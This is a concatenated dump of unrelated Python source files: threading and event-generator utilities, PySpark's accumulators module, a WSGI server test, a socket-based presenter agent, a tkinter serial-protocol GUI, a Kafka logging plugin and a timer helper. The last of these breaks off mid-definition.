thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(target=_kill_on_event, args=(termination_event,))
int_thread.daemon = True
int_thread.start()
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
class EventGenerationManager(object):
''' Utility class that wraps an event generator function, that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
'''
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, 'object_cls')
self.require_object = check.bool_param(require_object, 'require_object')
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
'self.object',
self.object_cls,
'generator never yielded object of type {}'.format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed('Called `get_object` before `generate_setup_events`')
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
for event in self.generator:
yield event
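# Illustrative usage sketch (commented out; MyContext and my_generator are
# hypothetical names, not part of this module):
#
#     manager = EventGenerationManager(my_generator(), MyContext)
#     for event in manager.generate_setup_events():
#         handle(event)                       # events yielded before the MyContext instance
#     context = manager.get_object()          # the single typed object
#     for event in manager.generate_teardown_events():
#         handle(event)                       # events yielded after it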
def utc_datetime_from_timestamp(timestamp):
tz = None
    if sys.version_info >= (3, 2):
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
|
accumulators.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> a = sc.accumulator(1)
>>> a.value
1
>>> a.value = 2
>>> a.value
2
>>> a += 5
>>> a.value
7
>>> sc.accumulator(1.0).value
1.0
>>> sc.accumulator(1j).value
1j
>>> rdd = sc.parallelize([1,2,3])
>>> def f(x):
... global a
... a += x
>>> rdd.foreach(f)
>>> a.value
13
>>> b = sc.accumulator(0)
>>> def g(x):
... b.add(x)
>>> rdd.foreach(g)
>>> b.value
6
>>> from pyspark.accumulators import AccumulatorParam
>>> class VectorAccumulatorParam(AccumulatorParam):
... def zero(self, value):
... return [0.0] * len(value)
... def addInPlace(self, val1, val2):
... for i in range(len(val1)):
... val1[i] += val2[i]
... return val1
>>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam())
>>> va.value
[1.0, 2.0, 3.0]
>>> def g(x):
... global va
... va += [x] * 3
>>> rdd.foreach(g)
>>> va.value
[7.0, 8.0, 9.0]
>>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> def h(x):
... global a
... a.value = 7
>>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
TypeError:...
"""
import sys
import select
import struct
if sys.version < '3':
import SocketServer
else:
import socketserver as SocketServer
import threading
from pyspark.serializers import read_int, PickleSerializer
__all__ = ['Accumulator', 'AccumulatorParam']
pickleSer = PickleSerializer()
# Holds accumulators registered on the current machine, keyed by ID. This is then used to send
# the local accumulator updates back to the driver program at the end of a task.
_accumulatorRegistry = {}
def _deserialize_accumulator(aid, zero_value, accum_param):
from pyspark.accumulators import _accumulatorRegistry
# If this certain accumulator was deserialized, don't overwrite it.
if aid in _accumulatorRegistry:
return _accumulatorRegistry[aid]
else:
accum = Accumulator(aid, zero_value, accum_param)
accum._deserialized = True
_accumulatorRegistry[aid] = accum
return accum
class Accumulator(object):
"""
A shared variable that can be accumulated, i.e., has a commutative and associative "add"
operation. Worker tasks on a Spark cluster can add values to an Accumulator with the C{+=}
operator, but only the driver program is allowed to access its value, using C{value}.
Updates from the workers get propagated automatically to the driver program.
While C{SparkContext} supports accumulators for primitive data types like C{int} and
C{float}, users can also define accumulators for custom types by providing a custom
L{AccumulatorParam} object. Refer to the doctest of this module for an example.
"""
def __init__(self, aid, value, accum_param):
"""Create a new Accumulator with a given initial value and AccumulatorParam object"""
from pyspark.accumulators import _accumulatorRegistry
self.aid = aid
self.accum_param = accum_param
self._value = value
self._deserialized = False
_accumulatorRegistry[aid] = self
def __reduce__(self):
"""Custom serialization; saves the zero value from our AccumulatorParam"""
param = self.accum_param
return (_deserialize_accumulator, (self.aid, param.zero(self._value), param))
@property
def value(self):
"""Get the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
return self._value
@value.setter
def value(self, value):
"""Sets the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
self._value = value
def add(self, term):
"""Adds a term to this accumulator's value"""
self._value = self.accum_param.addInPlace(self._value, term)
def __iadd__(self, term):
"""The += operator; adds a term to this accumulator's value"""
self.add(term)
return self
def __str__(self):
return str(self._value)
def __repr__(self):
return "Accumulator<id=%i, value=%s>" % (self.aid, self._value)
class AccumulatorParam(object):
"""
Helper object that defines how to accumulate values of a given type.
"""
def zero(self, value):
"""
Provide a "zero value" for the type, compatible in dimensions with the
provided C{value} (e.g., a zero vector)
"""
raise NotImplementedError
def addInPlace(self, value1, value2):
"""
Add two values of the accumulator's data type, returning a new value;
for efficiency, can also update C{value1} in place and return it.
"""
raise NotImplementedError
class AddingAccumulatorParam(AccumulatorParam):
"""
An AccumulatorParam that uses the + operators to add values. Designed for simple types
such as integers, floats, and lists. Requires the zero value for the underlying type
as a parameter.
"""
def __init__(self, zero_value):
self.zero_value = zero_value
def zero(self, value):
return self.zero_value
def addInPlace(self, value1, value2):
value1 += value2
return value1
# Singleton accumulator params for some standard types
INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0)
FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0)
COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j)
class _UpdateRequestHandler(SocketServer.StreamRequestHandler):
"""
This handler will keep polling updates from the same socket until the
server is shutdown.
"""
def handle(self):
from pyspark.accumulators import _accumulatorRegistry
auth_token = self.server.auth_token
def poll(func):
while not self.server.server_shutdown:
# Poll every 1 second for new data -- don't block in case of shutdown.
r, _, _ = select.select([self.rfile], [], [], 1)
if self.rfile in r:
if func():
break
def accum_updates():
num_updates = read_int(self.rfile)
for _ in range(num_updates):
(aid, update) = pickleSer._read_with_length(self.rfile)
_accumulatorRegistry[aid] += update
# Write a byte in acknowledgement
self.wfile.write(struct.pack("!b", 1))
return False
def authenticate_and_accum_updates():
received_token = self.rfile.read(len(auth_token))
if isinstance(received_token, bytes):
received_token = received_token.decode("utf-8")
if (received_token == auth_token):
accum_updates()
# we've authenticated, we can break out of the first loop now
return True
else:
raise Exception(
"The value of the provided token to the AccumulatorServer is not correct.")
# first we keep polling till we've received the authentication token
poll(authenticate_and_accum_updates)
# now we've authenticated, don't need to check for the token anymore
poll(accum_updates)
class AccumulatorServer(SocketServer.TCPServer):
    """
    A simple TCP server that intercepts shutdown() in order to interrupt
    our continuous polling on the handler.
    """
    server_shutdown = False
    def __init__(self, server_address, RequestHandlerClass, auth_token):
        SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass)
        self.auth_token = auth_token
def shutdown(self):
self.server_shutdown = True
SocketServer.TCPServer.shutdown(self)
self.server_close()
def _start_update_server(auth_token):
"""Start a TCP server to receive accumulator updates in a daemon thread, and returns it"""
server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler, auth_token)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
if __name__ == "__main__":
import doctest
(failure_count, test_count) = doctest.testmod()
if failure_count:
sys.exit(-1)
|
test_all_ctrls_wsgi.py
|
# coding: utf-8
import os
from typing import Dict
import unittest
from threading import Thread
from time import sleep
from unittest.case import skip
import urllib.request
import urllib.error
import http.client
from wsgiref.simple_server import WSGIServer, make_server
from simple_http_server.logger import get_logger, set_level
import simple_http_server.server as server
set_level("DEBUG")
_logger = get_logger("http_test")
class WSGIHttpRequestTest(unittest.TestCase):
PORT = 9090
WAIT_COUNT = 10
httpd: WSGIServer = None
server_ready = False
@classmethod
def start_server(clz):
_logger.info("start server in background. ")
root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
server.scan(project_dir=root, base_dir="tests/ctrls", regx=r'.*controllers.*')
wsgi_proxy = server.init_wsgi_proxy(resources={"/public/*": f"{root}/tests/static"})
def wsgi_simple_app(environment, start_response):
return wsgi_proxy.app_proxy(environment, start_response)
clz.httpd = make_server("", clz.PORT, wsgi_simple_app)
clz.server_ready = True
clz.httpd.serve_forever()
@classmethod
def setUpClass(clz):
Thread(target=clz.start_server, daemon=False, name="t").start()
retry = 0
while not clz.server_ready:
sleep(1)
retry = retry + 1
_logger.info(f"server is not ready wait. {retry}/{clz.WAIT_COUNT} ")
if retry >= clz.WAIT_COUNT:
raise Exception("Server start wait timeout.")
@classmethod
def tearDownClass(clz):
try:
clz.httpd.shutdown()
except:
pass
@classmethod
def visit(clz, ctx_path, headers: Dict[str, str] = {}, data=None, return_type: str = "TEXT"):
req: urllib.request.Request = urllib.request.Request(f"http://127.0.0.1:{clz.PORT}/{ctx_path}")
for k, v in headers.items():
req.add_header(k, v)
res: http.client.HTTPResponse = urllib.request.urlopen(req, data=data)
if return_type == "RESPONSE":
return res
elif return_type == "HEADERS":
headers = res.headers
res.close()
return headers
else:
txt = res.read().decode("utf-8")
res.close()
return txt
def test_header_echo(self):
res: http.client.HTTPResponse = self.visit(f"header_echo", headers={"X-KJ-ABC": "my-headers"}, return_type="RESPONSE")
assert "X-Kj-Abc" in res.headers
assert res.headers["X-Kj-Abc"] == "my-headers"
def test_static(self):
txt = self.visit("public/a.txt")
assert txt == "hello world!"
def test_path_value(self):
pval = "abc"
path_val = "xyz"
txt = self.visit(f"path_values/{pval}/{path_val}/x")
assert txt == f"<html><body>{pval}, {path_val}</body></html>"
def test_error(self):
try:
self.visit("error")
except urllib.error.HTTPError as err:
assert err.code == 400
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == "code:400, message: Parameter Error!, explain: Test Parameter Error!"
def test_exception(self):
try:
self.visit("exception")
except urllib.error.HTTPError as err:
assert err.code == 500
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == '500-Internal Server Error-some error occurs!'
|
presenter_agent.py
|
# !/usr/bin/env python
# -*- coding:utf-8 -*-
# Copyright 2021 Huawei Technologies Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from threading import Thread
from .socket_client import AgentSocket
from . import presenter_message as pm
from . import presenter_datatype as datatype
class PresenterAgent():
def __init__(self, server_ip, port):
self.socket = AgentSocket(server_ip, port)
self._closed = False
def connect_server(self):
return self.socket.connect()
def start_heard_beat_thread(self):
self.heart_beat_thread = Thread(target=self._keep_alive)
self.heart_beat_thread.start()
def _keep_alive(self):
msg = pm.heartbeat_message()
while True:
if self._closed:
print("ERROR:Heard beat thread exit")
break
self.socket.send_msg(msg)
time.sleep(2)
def exit(self):
self.socket.close()
self._closed = True
def StartPresenterAgent(msg_queue, server_ip, port, open_status, data_respone_counter):
agent = PresenterAgent(server_ip, port)
ret = agent.connect_server()
if ret:
print("ERROR:Connect server failed, ret =", ret)
return
open_status.value = datatype.STATUS_CONNECTED
while True:
data = msg_queue.get()
if open_status.value == datatype.STATUS_EXITING:
open_status.value = datatype.STATUS_EXITTED
agent.exit()
break
if data:
agent.socket.send_msg(data)
msg_name, msg_body = agent.socket.recv_msg()
        if msg_name is None or msg_body is None:
print("ERROR:Recv invalid message, message name ", msg_name)
continue
if ((open_status.value == datatype.STATUS_CONNECTED)
and pm.is_open_channel_response(msg_name)):
print("Received open channel respone")
open_status.value = datatype.STATUS_OPENED
agent.start_heard_beat_thread()
print("presenter agent change connect_status to ", open_status.value)
if ((open_status.value == datatype.STATUS_OPENED) and
pm.is_image_frame_response(msg_name)):
data_respone_counter.value += 1
print("send ok ", data_respone_counter.value)
|
IOMaster_GUI_NoBoard.py
|
import tkinter as TK
import usb.core
import usb.util
import serial
import time
import threading
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
window = TK.Tk()
window.title("IO Master Setup")
window.geometry("400x500")
tabControl = ttk.Notebook(window)
sendTab = ttk.Frame(tabControl)
receiveTab = ttk.Frame(tabControl)
tabControl.add(sendTab, text= 'Send')
tabControl.add(receiveTab, text='Receive')
tabControl.grid(column=0, row=1, columnspan=2) #expand=1, fill="both")
#def refresh(eventObject):
#insert code to reload the window
#ser = serial.Serial(port='COM8', baudrate=115200)
#def read_from_port(ser):
# while True:
# reading = ser.read()
# print(reading)
# if reading == b'3':
# messagebox.showinfo("Works", "Pushed Button")
#def sendCommand(command):
# ser.write(command.encode('ascii', 'ignore'))
class Label:
def __init__(self, win, text):
self.lbl=ttk.Label(win, text=text)
#self.lbl.grid(column=clmn, row=row)
class combobox:
def __init__(self, win, values):
self.cb=ttk.Combobox(win, values=values, state = "readonly")
#self.cb.grid(column=clmn, row=row)
#self.cb.current(1)
def Configure_Results():
#Store Variables
Protocol = cb0.cb.get()
UVoltage = cb1.cb.get()
Frequency = cb2.cb.get()
LVoltage = cb4.cb.get()
DPower = cb5.cb.get()
DataRate = cb6.cb.get()
ClPolarity = cb7.cb.get()
ChPolarity = cb9.cb.get()
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', END)
#if Protocol == "I2C":
#if Protocol == "UART":
#if Protocol == "SPI":
#if Protocol == "SWD":
#if Protocol == "RS-485":
if Protocol == "":
OutConfigTxt.insert(TK.END, "Protocol: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Protocol: " + Protocol + '\n')
if UVoltage == "":
OutConfigTxt.insert(TK.END, "Upper Voltage: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Upper Voltage: " + UVoltage + '\n')
if Frequency == "":
OutConfigTxt.insert(TK.END, "Frequency: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Frequency: " + Frequency + '\n')
if LVoltage == "":
OutConfigTxt.insert(TK.END, "Lower Voltage: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Lower Voltage: " + LVoltage + '\n')
if DPower == "":
OutConfigTxt.insert(TK.END, "Device Power Level: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Device Power Level: " + DPower + '\n')
if DataRate == "":
OutConfigTxt.insert(TK.END, "Data Rate: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Data Rate: " + DataRate + '\n')
if ClPolarity == "":
OutConfigTxt.insert(TK.END, "Clock Polarity: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Clock Polarity: " + ClPolarity + '\n')
if ChPolarity == "":
OutConfigTxt.insert(TK.END, "Chip Polarity: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Chip Polarity: " + ChPolarity + '\n')
OutConfigTxt.configure(state="disable")
#if voltage == "3.3V":
#sendCommand('v0')
#if voltage == "5V":
#sendCommand('v1')
#if voltage == "12V":
#sendCommand('v2')
#if voltage == "24V":
#sendCommand('v3')
#Wait for OKAY (z)
#window.after(1000)
#if frequency == "1kHZ":
#sendCommand('f0')
#if frequency == "10kHZ":
#sendCommand('f1')
#if frequency == "100kHZ":
#sendCommand('f2')
#if frequency == "1MHZ":
#sendCommand('f3')
#End Function
def Data_To_Send():
dataToSend = DataText3.get('1.0', END)
for letter in dataToSend.rstrip():
        if letter != '0' and letter != '1':
            messagebox.showinfo("Error", "Invalid Data.\n 0s and 1s Only")
            return
    if dataToSend == '\n':
        messagebox.showinfo("Error", "Please Enter Data to Send.\n 0s and 1s Only")
        return
    if len(dataToSend.rstrip()) != 8:
        messagebox.showinfo("Error", "Invalid Data.\n Should be 8 bits long.\n 0s and 1s Only")
return
#print(dataToSend.rstrip())
dataToSend = 's' + dataToSend.rstrip() + '\0'
#print(dataToSend.rstrip())
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', END)
OutConfigTxt.insert(TK.END, "Data Sent: " + dataToSend.rstrip() + '\n' + str(len(dataToSend.rstrip())))
OutConfigTxt.configure(state="disable")
#sendCommand(dataToSend.rstrip())
class Button:
def __init__(self, win, text):
self.btn=ttk.Button(win, text=text, command=self.press)
#self.btn.grid(column=clmn, row=row)
def press(self):
btn_text = self.btn.cget('text')
if btn_text == "Configure":
Configure_Results()
if btn_text == "Send Data":
Data_To_Send()
#Each object needs to be created ouside the function and placed on the window in the function
lbl0 = Label(window, "Protocol:") #Protocol
lbl1 = Label(sendTab, "Upper Voltage:") #Upper Voltage
lbl2 = Label(sendTab, "Frequency:") #Frequency
lbl3 = Label(sendTab, "Data to Send:") #Data to Send
lbl4 = Label(sendTab, "Lower Voltage:") #Lower Voltage
lbl5 = Label(sendTab, "Device Power Voltage:") #Device Power Voltage
lbl6 = Label(sendTab, "Data Rate:") #Data Rate
lbl7 = Label(sendTab, "Clock Polarity:") #Clock Polarity (Rise or fall)
lbl8 = Label(sendTab, "Device Address:") #Device Address
lbl9 = Label(sendTab, "Chip Select Polarity:") #Chip Select Polarity
lbl0.lbl.grid(column=0, row=0) #place protocol selection label (Always On)
cb0 = combobox(window, ["I2C", "UART", "SPI", "SWD", "RS-485"]) #create drop down for protocol selection
cb1 = combobox(sendTab, ["3.3V","5V", "12V", "24V" ]) #Voltage Selection
cb2 = combobox(sendTab, ["1kHz", "10kHz", "100kHz", "1MHz"]) #Frequency Selection
cb4 = combobox(sendTab, ["-3.3V","-5V", "-12V", "-24V" ]) #Lower volatage level
cb5 = combobox(sendTab, ["3.3V","5V", "12V", "24V" ]) #Device Power Level
cb6 = combobox(sendTab, ["Data Rates"]) #Data Rates
cb7 = combobox(sendTab, ["Rising Edge", "Falling edge"]) #Clock Polarity
cb9 = combobox(sendTab, ["0", "1"]) #Chip Select Polarity
cb0.cb.grid(column=1, row=0) #Place drop down for protocols
DataText3 = TK.Text(sendTab, height=1, width=17) #Box to enter 8 bit command to board (gets checked)
AddressText = TK.Text(sendTab, height=1, width=17) #Box to enter the device address.
OutConfigTxt = TK.Text(window, height = 15, width = 42, state = "disabled") #Display sent configurables in this box
OutConfigTxt.grid(column=0, row=6, columnspan=3)
btn1 = Button(sendTab, "Configure") #Send configure
btn2 = Button(sendTab, "Send Data")
#Choose which objects are displayed based on the protocol chosen
def display_create(window):
#Create Interface for SPI
if cb0.cb.get() == 'SPI':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid(column=0, row=5) #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid(column=0, row=8) #Device Address
lbl9.lbl.grid(column=0, row=9) #Chip Select Polarity
cb1.cb.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid(column=1, row=5) #Frequency
cb4.cb.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid(column=1, row=9) #Chip Select Polarity
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid(column=1, row=8) #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display I2C Components
if cb0.cb.get() == 'I2C':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid(column=0, row=5) #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid(column=0, row=8) #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
cb1.cb.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid(column=1, row=5) #Frequency
cb4.cb.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb9.cb.set('')
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid(column=1, row=8) #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display UART Components
if cb0.cb.get() == 'UART':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
cb1.cb.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
cb4.cb.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', END)
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display SWD Components
if cb0.cb.get() == 'SWD':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid_forget() #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid_forget() #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
cb1.cb.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
cb4.cb.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid_forget() #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb6.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', END)
DataText3.delete('1.0', END)
DataText3.grid_forget() #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid_forget() #Send Data from text box
#display RS-485 Components
if cb0.cb.get() == 'RS-485':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid_forget() #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
cb1.cb.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
cb4.cb.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid_forget() #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb7.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', END)
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
cb0.cb.bind("<<ComboboxSelected>>", display_create) #link protocol selection combobox to ubove function. Display fields update when drop box changes.
#if dev is None:
#raise ValueError('The device is not connnected')
#messagebox.showinfo("Works", "No Device Connected")
def main():
#serialThread = threading.Thread(target=read_from_port, args=(ser,))
#serialThread.start()
window.mainloop()
if (__name__ == '__main__'):
main()
|
logger.py
|
import web
import threading
import time
import sys
from pirulo import Handler
class TopicsHandler:
def GET(self):
return Plugin.INSTANCE.topics
class ConsumersHandler:
def GET(self):
return Plugin.INSTANCE.consumers
class Plugin(Handler):
INSTANCE = None
def __init__(self):
Handler.__init__(self)
Plugin.INSTANCE = self
self.fd = open('/tmp/events', 'w')
self.topics = []
self.consumers = []
self.thread = threading.Thread(target=self.launch_server)
self.thread.start()
def handle_initialize(self):
self.subscribe_to_consumers()
self.subscribe_to_consumer_commits()
self.subscribe_to_topics()
self.subscribe_to_topic_message()
def launch_server(self):
try:
urls = (
'/topics', 'TopicsHandler',
'/consumers', 'ConsumersHandler',
)
sys.argv = []
app = web.application(urls, globals())
app.run()
except Exception as ex:
print 'Failed running server: ' + str(ex)
def log_message(self, message):
self.fd.write(message + '\n')
self.fd.flush()
def handle_new_consumer(self, group_id):
self.log_message('New consumer {0} found'.format(group_id))
self.consumers.append(group_id)
def handle_new_topic(self, topic):
self.log_message('Found topic {0}'.format(topic))
self.topics.append(topic)
def handle_consumer_commit(self, group_id, topic, partition, offset):
self.log_message('Consumer {0} committed to {1}/{2} offset {3}'.format(
group_id,
topic,
partition,
offset
))
def handle_topic_message(self, topic, partition, offset):
self.log_message('New offset for topic {0}/{1} at offset {2}'.format(
topic,
partition,
offset
))
def create_plugin():
return Plugin()
|
thread.py
|
'''
@author: frank
'''
import threading
import inspect
import pprint
import traceback
import log
import functools
logger = log.get_logger(__name__)
class AsyncThread(object):
def __init__(self, func):
self.func = func
def __get__(self, obj, type=None):
return self.__class__(self.func.__get__(obj, type))
def __call__(self, *args, **kw):
return ThreadFacade.run_in_thread(self.func, args=args, kwargs=kw)
class ThreadFacade(object):
@staticmethod
def run_in_thread(target, args=(), kwargs={}):
def safe_run(*sargs, **skwargs):
try:
target(*sargs, **skwargs)
except Exception as e:
content = traceback.format_exc()
err = '%s\n%s\nargs:%s' % (str(e), content, pprint.pformat([args, kwargs]))
logger.warn(err)
t = threading.Thread(target=safe_run, name=target.__name__, args=args, kwargs=kwargs)
t.start()
return t
class PeriodicTimer(object):
def __init__(self, interval, callback, args=[], kwargs={}, stop_on_exception=True):
self.interval = interval
self.args = args
self.kwargs = kwargs
self.stop_on_exception = stop_on_exception
@functools.wraps(callback)
def wrapper(*args, **kwargs):
result = not self.stop_on_exception
try:
result = callback(*args, **kwargs)
except Exception as e:
content = traceback.format_exc()
err = '%s\n%s\nargs:%s' % (str(e), content, pprint.pformat([args, kwargs]))
logger.warn(err)
logger.warn('this timer thread will be terminated immediately due to the exception')
if result:
self.thread = threading.Timer(self.interval, self.callback, self.args, self.kwargs)
self.thread.start()
self.callback = wrapper
@AsyncThread
def start(self):
self.thread = threading.Timer(self.interval, self.callback, self.args, self.kwargs)
self.thread.start()
def cancel(self):
self.thread.cancel()
def timer(interval, function, args=[], kwargs={}, stop_on_exception=True):
